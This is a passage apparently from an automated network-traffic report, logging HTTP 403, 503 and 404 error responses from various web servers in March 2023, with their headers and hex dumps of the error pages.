0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:44:56 GMTX-Zen-Fury: e09d993faee6ea038e1ad4b38d9339b375b58368Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 31 37 30 22 2c 20 31 36 37 39 34 36 30 32 36 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1170", 1679460269, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AtlRw8FtconUFTfFptd9OLOJZYr0dIra2toNut6WZw8j%2B7613o5qilbcCIc%2BCV3zTzHqXR4wn2lowmF3h3WPCjaOrYrV9FsZXyyM95nl2uBnPFmideQ1WzPMukVYaoA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc84718592c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:56 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AoyHLAfcNcci0NcTpPtgK5uA3J94JqONys6Z7DXUchvdXk32f1tENx24BTEWOLvs5eecgUVxu%2FTbMqFl7ksvqdwvb%2B%2FkNYgY4csIRbdP9pZKzXMPCj4ZMpk7Bi%2FZ6jI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc84788982c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:44:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: 0d232b2ec4 0.32 0.001058 0030 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OP7%2FaCgU1J3BKKXdgi3rR0PkRdxP3IlDTUevXm4%2BfpnJvWigxS6HSQFATpN1J%2BkcPoB6BrX4%2FVsUtKsW64QxaBycycP3NDg6QBQYhPpntUakupi33h1eXsvHgIuOrk0LHaM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc84dea33695d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-siz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:44:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 8b6e3e1b-1382-4fad-bc26-ac39e5a82c8cCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3l0WMoLfH08jp6QMNDJgWhMGDVp8cLaU6oOPucxvAtDJR0rjel0A9sXkA93iL87fgRdizi3SXtKCcBy5RDxu290KCCAz5oiLElcpDCbaoKg%2F2QIQmCJbk7oHc%2Fy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=142.999887Server: cloudflareCF-RAY: 7abbc851e8aa9b61-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:44:59 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:59 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: 